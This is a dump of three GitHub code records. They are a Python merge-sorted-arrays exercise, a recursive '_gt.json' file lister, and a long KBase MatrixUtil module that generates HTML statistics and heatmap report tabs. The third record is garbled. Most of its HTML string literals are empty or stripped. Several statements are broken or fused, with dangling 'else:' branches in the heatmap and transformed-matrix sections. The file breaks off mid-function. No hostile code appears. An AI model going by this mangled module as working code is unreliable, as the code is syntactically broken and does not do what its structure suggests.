+{"seq_id":"36297979331","text":"# -*- coding: utf-8 -*-\r\n__author__ = 'yunge'\r\n\r\n'''\r\nMerge two given sorted integer arrays A and B into a new sorted integer array.\r\n\r\n\r\nExample\r\nA=[1,2,3,4]\r\nB=[2,4,5,6]\r\nreturn [1,2,2,3,4,4,5,6]\r\n\r\nChallenge\r\nHow can you optimize your algorithm if one array is very large and the other is very small?\r\n'''\r\n\r\ndef mergeSortedArray(A, B):\r\n i = j = 0\r\n C = []\r\n while i + j <= len(A) + len(B):\r\n if i == len(A):\r\n C += B[j:]\r\n break\r\n elif j == len(B):\r\n C += A[i:]\r\n break\r\n elif A[i] < B[j]:\r\n C.append(A[i])\r\n i += 1\r\n else:\r\n C.append(B[j])\r\n j += 1\r\n return C\r\n\r\n\r\nA=[1]\r\nB=[1]\r\nprint(mergeSortedArray(A, B))","repo_name":"yunge008/LintCode","sub_path":"2.IntegerArray/[E]Merge Sorted Array II.py","file_name":"[E]Merge Sorted Array II.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21547695207","text":"import os \n\ndef get_list(dir,filelist):\n next_dir=dir\n if(os.path.isfile(dir)): # check whether this path is a file\n if('_gt.json' in dir):\n filelist.append(dir)\n elif os.path.isdir(dir): # otherwise, check whether it is a directory\n for f in os.listdir(dir): # read every entry under the current path in turn\n next_dir=os.path.join(dir,f) # join the entry name onto the current path\n get_list(next_dir,filelist) # recurse\n return filelist\n\nif __name__==\"__main__\":\n start_dir=input(\"Enter the target path: \")\n res_list=get_list(start_dir,[])\n print(len(res_list))\n for name in res_list:\n print(name)\n    
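\n# Example (hypothetical): with start_dir='./labels', this prints the number of '_gt.json' files found under that tree, then each matching path on its own line.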
","repo_name":"kam1noki/Stat_json","sub_path":"Stat_json.py","file_name":"Stat_json.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16961444266","text":"import collections\nimport errno\nimport logging\nimport os\nimport re\nimport shutil\nimport uuid\nimport time\nimport csv\n\nimport pandas as pd\nimport numpy as np\nfrom openpyxl import load_workbook\nfrom xlrd.biffh import XLRDError\nfrom sklearn import preprocessing\nfrom skbio.stats.composition import ilr, clr\nfrom skbio import DistanceMatrix\nfrom skbio.stats.distance import anosim, permanova, permdisp, pwmantel\nimport scipy.spatial.distance as dist\nfrom scipy.cluster.hierarchy import dendrogram, linkage\nfrom scipy.spatial.distance import pdist\nimport rpy2.robjects.packages as rpackages\nimport rpy2.robjects as ro\nfrom rpy2.robjects import pandas2ri, numpy2ri\nfrom rpy2.robjects.conversion import localconverter\nimport plotly.graph_objects as go\nfrom plotly.offline import plot\nimport plotly.express as px\n\nfrom installed_clients.DataFileUtilClient import DataFileUtil\nfrom GenericsAPI.Utils.AttributeUtils import AttributesUtil\nfrom GenericsAPI.Utils.SampleServiceUtil import SampleServiceUtil\nfrom GenericsAPI.Utils.DataUtil import DataUtil\nimport GenericsAPI.Utils.MatrixValidation as vd\nfrom installed_clients.KBaseReportClient import KBaseReport\nfrom installed_clients.fba_toolsClient import fba_tools\nfrom installed_clients.kb_GenericsReportClient import kb_GenericsReport\nfrom installed_clients.SampleServiceClient import SampleService\n\nTYPE_ATTRIBUTES = {'description', 'scale', 'row_normalization', 'col_normalization'}\nSCALE_TYPES = {'raw', 'ln', 'log2', 'log10'}\nRANKS = ['Domain', 'Phylum', 'Class', 'Order', 'Family', 'Genus']\n\n\nclass MatrixUtil:\n\n def _validate_import_matrix_from_excel_params(self, params):\n \"\"\"\n _validate_import_matrix_from_excel_params:\n validates params passed to import_matrix_from_excel method\n \"\"\"\n logging.info('start validating import_matrix_from_excel params')\n\n # check for required parameters\n for p in ['obj_type', 'matrix_name', 'workspace_name', 'scale']:\n if p not in params:\n raise ValueError('\"{}\" parameter is required, but missing'.format(p))\n\n obj_type = params.get('obj_type')\n if obj_type not in self.matrix_types:\n raise ValueError('Unknown matrix object type: {}'.format(obj_type))\n\n scale = params.get('scale')\n if scale not in SCALE_TYPES:\n raise ValueError('Unknown scale type: {}'.format(scale))\n\n if params.get('input_file_path'):\n file_path = params.get('input_file_path')\n elif params.get('input_shock_id'):\n file_path = self.dfu.shock_to_file(\n {'shock_id': params['input_shock_id'],\n 'file_path': self.scratch}).get('file_path')\n elif params.get('input_staging_file_path'):\n file_path = self.dfu.download_staging_file(\n {'staging_file_subdir_path': params.get('input_staging_file_path')}\n ).get('copy_file_path')\n else:\n error_msg = \"Must supply either a input_shock_id or input_file_path \"\n error_msg += \"or input_staging_file_path\"\n raise ValueError(error_msg)\n\n refs = {k: v for k, v in params.items() if \"_ref\" in k}\n\n return (obj_type, file_path, params.get('workspace_name'),\n params.get('matrix_name'), refs, scale)\n\n def _upload_to_shock(self, file_path):\n \"\"\"\n _upload_to_shock: upload target file to shock using DataFileUtil\n \"\"\"\n logging.info('Start uploading file to shock: {}'.format(file_path))\n\n 
file_to_shock_params = {\n 'file_path': file_path,\n 'pack': 'zip'\n }\n shock_id = self.dfu.file_to_shock(file_to_shock_params).get('shock_id')\n\n return shock_id\n\n @staticmethod\n def _mkdir_p(path):\n \"\"\"\n _mkdir_p: make directory for given path\n \"\"\"\n if not path:\n return\n try:\n os.makedirs(path)\n except OSError as exc:\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\n @staticmethod\n def _find_between(s, start, end):\n \"\"\"\n _find_between: find string in between start and end\n \"\"\"\n\n return re.search('{}(.*){}'.format(start, end), s).group(1)\n\n @staticmethod\n def _write_mapping_sheet(file_path, sheet_name, mapping, index):\n \"\"\"\n _write_mapping_sheet: write mapping to sheet\n \"\"\"\n df_dict = collections.OrderedDict()\n\n df_dict[index[0]] = []\n df_dict[index[1]] = []\n\n for key, value in mapping.items():\n df_dict.get(index[0]).append(key)\n df_dict.get(index[1]).append(value)\n\n df = pd.DataFrame.from_dict(df_dict)\n\n with pd.ExcelWriter(file_path, engine='openpyxl') as writer:\n writer.book = load_workbook(file_path)\n df.to_excel(writer, sheet_name=sheet_name)\n\n def _generate_tab_content(self, index_page, viewer_name):\n tab_content = ''\n\n if index_page:\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '\\n\\n

      \\n'\n\n tab_content += '\\n
      \\n'\n\n return tab_content\n\n def _generate_simper_visualization_content(self, simper_ret, simper_sum,\n species_stats, grouping_names, output_directory):\n tab_def_content = ''\n tab_content = ''\n\n viewer_name = 'simper_plot'\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_simper_plot_content(viewer_name, species_stats,\n grouping_names, output_directory)\n\n viewer_name = 'simper_ret'\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_simper_tab_content(simper_ret, viewer_name)\n\n viewer_name = 'simper_sum'\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_simper_tab_content(simper_sum, viewer_name)\n\n tab_def_content += '\\n
      \\n'\n return tab_def_content + tab_content\n\n def _generate_variable_stats_visualization_content(self, anosim_res,\n permanova_res, permdisp_res):\n tab_def_content = ''\n tab_content = ''\n\n first_tab_token = False\n\n if anosim_res is not None:\n viewer_name = 'anosim_res'\n\n first_tab_token = True\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_variable_stat_tab_content(anosim_res, viewer_name)\n\n if permanova_res is not None:\n\n viewer_name = 'permanova_res'\n\n if first_tab_token:\n tab_def_content += '''\\n\\n'''\n else:\n first_tab_token = True\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_variable_stat_tab_content(permanova_res, viewer_name)\n\n if permdisp_res is not None:\n viewer_name = 'permdisp_res'\n\n if first_tab_token:\n tab_def_content += '''\\n\\n'''\n else:\n # first_tab_token = True\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += self._generate_variable_stat_tab_content(permdisp_res, viewer_name)\n\n tab_def_content += '\\n
      \\n'\n return tab_def_content + tab_content\n\n def _generate_rarefy_visualization_content(self, output_directory,\n rarefied_matrix_dir, rarecurve_image,\n obs_vs_rare_image, random_rare_df):\n tab_def_content = ''\n tab_content = ''\n\n row_data_summary = random_rare_df.T.describe().round(2).to_string()\n col_data_summary = random_rare_df.describe().round(2).to_string()\n\n tab_def_content = ''\n tab_content = ''\n\n viewer_name = 'data_summary'\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += '''\\n
      '''.format(\n viewer_name)\n tab_content += '''\\n
      Rarefied Matrix Size: {} x {}
      '''.format(\n len(random_rare_df.index),\n len(random_rare_df.columns))\n tab_content += '''\\n
      Row Aggregating Statistics
      '''\n html = '''\\n
      ''' + str(row_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      Column Aggregating Statistics
      '''\n html = '''\\n
      ''' + str(col_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '\\n
      \\n'\n\n viewer_name = 'RarefiedMatrixViewer'\n tab_def_content += '''\\n\\n'''\n rarefied_matrix_report_files = os.listdir(rarefied_matrix_dir)\n rarefied_matrix_index_page = None\n for rarefied_matrix_report_file in rarefied_matrix_report_files:\n if rarefied_matrix_report_file.endswith('.html'):\n rarefied_matrix_index_page = rarefied_matrix_report_file\n\n shutil.copy2(os.path.join(rarefied_matrix_dir, rarefied_matrix_report_file),\n output_directory)\n tab_content += self._generate_tab_content(rarefied_matrix_index_page, viewer_name)\n\n rarecurve_image_name = os.path.basename(rarecurve_image)\n shutil.copy2(rarecurve_image,\n os.path.join(output_directory, rarecurve_image_name))\n\n obs_vs_rare_image_name = os.path.basename(obs_vs_rare_image)\n shutil.copy2(obs_vs_rare_image,\n os.path.join(output_directory, obs_vs_rare_image_name))\n\n viewer_name = 'RarecurvePlot'\n tab_def_content += '''\\n\\n'''\n\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '''\\n\\n'''\n tab_content += '''
      \\n
      \\n'''\n tab_content += '''\\n\\n'''\n tab_content += '\\n
      \\n'\n\n tab_def_content += '\\n
      \\n'\n return tab_def_content + tab_content\n\n def _generate_trans_visualization_content(self, output_directory,\n operations, heatmap_html_dir_l,\n transformed_matrix_df, variable_specific):\n row_data_summary = transformed_matrix_df.T.describe().round(2).to_string()\n col_data_summary = transformed_matrix_df.describe().round(2).to_string()\n\n tab_def_content = ''\n tab_content = ''\n\n op_2_name = {\n 'abundance_filtering': 'Filtered',\n 'ubiquity_filtering': 'Filtered',\n 'standardization': 'Standardized',\n 'ratio_transformation': 'Log Ratio Transformed',\n 'relative_abundance': 'Relative Abundance',\n 'logit': 'Logit',\n 'sqrt': 'Square Root',\n 'log': 'Log',\n 'normalization': 'Normalized',\n }\n\n ## Start tabs ##\n tab_def_content += '''\\n
      \\n'''\n\n ## Operations tabs ##\n for i, (op, heatmap_html_dir) in enumerate(zip(operations, heatmap_html_dir_l)):\n viewer_name = 'op%s_%s' % (i, op)\n tab_def_content += '''\\n\\n''' % (i+1, op_2_name[op])\n\n flnms = os.listdir(heatmap_html_dir)\n heatmap_html_flnm = None\n for flnm in flnms:\n if flnm.endswith('.html'):\n heatmap_html_flnm = flnm\n\n shutil.copy2(os.path.join(heatmap_html_dir, flnm), output_directory)\n tab_content += self._generate_tab_content(heatmap_html_flnm, viewer_name)\n\n ## Transformed matrix statistics tab ##\n viewer_name = 'data_summary'\n tab_def_content += '''\\n\\n'''\n else:\n tab_def_content += '''>Transformed Matrix Statistics\\n'''\n tab_content += '''\\n
      '''.format(\n viewer_name)\n if variable_specific:\n tab_content += '''\\n
      Transformed Selected Variables Size: {} x {}
      '''.format(\n len(transformed_matrix_df.index),\n len(transformed_matrix_df.columns))\n else:\n tab_content += '''\\n
      Transformed Matrix Size: {} x {}
      '''.format(\n len(transformed_matrix_df.index),\n len(transformed_matrix_df.columns))\n tab_content += '''\\n
      Row Aggregating Statistics
      '''\n html = '''\\n
      ''' + str(row_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      Column Aggregating Statistics
      '''\n html = '''\\n
      ''' + str(col_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '\\n
      \\n'\n\n tab_def_content += '\\n
      \\n'\n return tab_def_content + tab_content\n\n def _create_chem_abun_heatmap(self, output_directory, data_groups):\n\n data_df = pd.concat(data_groups.values())\n\n col_ordered_label = self._compute_cluster_label_order(data_df.T.values.tolist(),\n data_df.T.index.tolist())\n data_df = data_df.reindex(columns=col_ordered_label)\n\n data_label_groups_pos = dict()\n\n for group_name, data_group_df in data_groups.items():\n if pd.isna(group_name[1]):\n label_name = group_name[0]\n else:\n label_name = '{} ({})'.format(group_name[0], group_name[1])\n\n data_label_groups_pos[label_name] = [\n data_df.index.to_list().index(data_id) for data_id in data_group_df.index]\n\n heatmap_file_name = 'chem_abun_heatmap_{}.html'.format(str(uuid.uuid4()))\n heatmap_path = os.path.join(output_directory, heatmap_file_name)\n\n colors = px.colors.sequential.OrRd\n colorscale = [[0, colors[1]], # 0\n [1./10000, colors[2]], # 10\n [1./1000, colors[3]], # 100\n [1./100, colors[4]], # 1000\n [1./10, colors[5]], # 10000\n [1., colors[6]]]\n\n layout = go.Layout(xaxis={'type': 'category'},\n yaxis={'type': 'category'})\n\n fig = go.Figure(data=go.Heatmap(\n z=data_df.values,\n x=data_df.columns,\n y=data_df.index,\n hoverongaps=False,\n coloraxis='coloraxis'), layout=layout)\n\n width = max(15 * data_df.columns.size, 1400)\n height = max(10 * data_df.index.size, 1000)\n fig.update_layout(coloraxis=dict(colorscale=colorscale),\n plot_bgcolor='rgba(0,0,0,0)',\n autosize=True,\n width=width,\n height=height,\n xaxis=dict(tickangle=45,\n automargin=True,\n tickfont=dict(color='black', size=8)),\n yaxis=dict(automargin=True,\n tickfont=dict(color='black', size=8)))\n\n colors = px.colors.qualitative.Bold\n chemical_types = ['aggregate', 'exometabolite', 'specific']\n text_height = 0\n col_size = width / data_df.columns.size\n label_pos = 70 / col_size\n if len(data_label_groups_pos) > 1:\n for i, label_name in enumerate(data_label_groups_pos):\n data_label_idx = data_label_groups_pos[label_name]\n chemical_type = label_name.split(' ')[0]\n if i == 0:\n fig.update_layout(yaxis=dict(range=[0, data_df.index.size-1],\n tickvals=data_label_idx,\n automargin=True,\n tickfont=dict(\n color=colors[chemical_types.index(chemical_type)],\n size=8)))\n\n text_height += len(data_label_idx) - 1\n fig.add_annotation(x=label_pos, y=0.5,\n ax=label_pos, ay=text_height,\n text=label_name,\n showarrow=True,\n xref=\"x\", yref=\"y\",\n axref=\"x\", ayref=\"y\",\n arrowside='start',\n # arrowwidth=1.5,\n font=dict(color=colors[chemical_types.index(chemical_type)],\n size=8))\n else:\n fig.add_trace(dict(yaxis='y{}'.format(i + 1)))\n fig.update_layout({'yaxis{}'.format(i + 1): dict(\n range=[0, data_df.index.size-1],\n tickvals=data_label_idx,\n ticktext=[data_df.index[i] for i in data_label_idx],\n tickfont=dict(color=colors[chemical_types.index(chemical_type)], size=8),\n automargin=True,\n overlaying='y')})\n text_height += len(data_label_idx)\n fig.add_annotation(x=label_pos, y=text_height - len(data_label_idx) + 1,\n ax=label_pos, ay=text_height,\n text=label_name,\n showarrow=True,\n xref=\"x\", yref=\"y\",\n axref=\"x\", ayref=\"y\",\n arrowside='start',\n # arrowwidth=1.5,\n font=dict(color=colors[chemical_types.index(chemical_type)],\n size=8))\n\n plot(fig, filename=heatmap_path)\n\n return heatmap_file_name\n\n def _generate_chem_visualization_content(self, output_directory, data_groups):\n tab_def_content = ''\n tab_content = ''\n\n viewer_name = 'data_summary'\n tab_def_content += '''\\n
      \\n'''\n tab_def_content += '''\\n\\n'''\n\n tab_content += '''\\n
      '''.format(\n viewer_name)\n\n chemical_types = list(data_groups.keys())\n chemical_types = ['{} ({})'.format(item[0], item[1]) for item in chemical_types]\n type_text = 'Chemical Type' if len(chemical_types) == 1 else 'Chemical Types'\n tab_content += '''\\n
      {}: {}
      '''.format(type_text,\n ', '.join(chemical_types))\n\n for chemical_type, data_df in data_groups.items():\n chemical_type = '{} ({})'.format(chemical_type[0], chemical_type[1])\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n tab_content += '''\\n
      '''\n row_data_summary = data_df.T.describe().round(2).to_string()\n col_data_summary = data_df.describe().round(2).to_string()\n tab_content += '''\\n
      {} Chemical Matrix Size: {} x {}
      '''.format(\n chemical_type[0].upper() + chemical_type[1:],\n len(data_df.index),\n len(data_df.columns))\n tab_content += '''\\n
      {} Row Aggregating Statistics
      '''.format(\n chemical_type[0].upper() + chemical_type[1:])\n html = '''\\n
      ''' + \\\n                str(row_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '''\\n
      {} Column Aggregating Statistics
      '''.format(\n chemical_type[0].upper() + chemical_type[1:])\n html = '''\\n
      ''' + \\\n                str(col_data_summary).replace(\"\\n\", \"
      \") + \"
      \"\n tab_content += html\n tab_content += '\\n
      \\n'\n\n heatmap_index_page = self._create_chem_abun_heatmap(output_directory, data_groups)\n viewer_name = 'MatrixHeatmapViewer'\n tab_def_content += '''\\n\\n'''\n\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '\\n'\n tab_content += '\\n
      \\n'\n else:\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '''\\n

      '''\n tab_content += '''Heatmap is too large to be displayed.

      \\n'''\n tab_content += '\\n
      \\n'\n\n viewer_name = 'MatrixHeatmapViewer'\n tab_def_content += '''\\n\\n'''\n\n heatmap_report_files = os.listdir(heatmap_dir)\n\n heatmap_index_page = None\n for heatmap_report_file in heatmap_report_files:\n if heatmap_report_file.endswith('.html'):\n heatmap_index_page = heatmap_report_file\n\n shutil.copy2(os.path.join(heatmap_dir, heatmap_report_file),\n output_directory)\n\n if heatmap_index_page:\n tab_content += '''\\n
      '''.format(viewer_name)\n tab_content += '\\n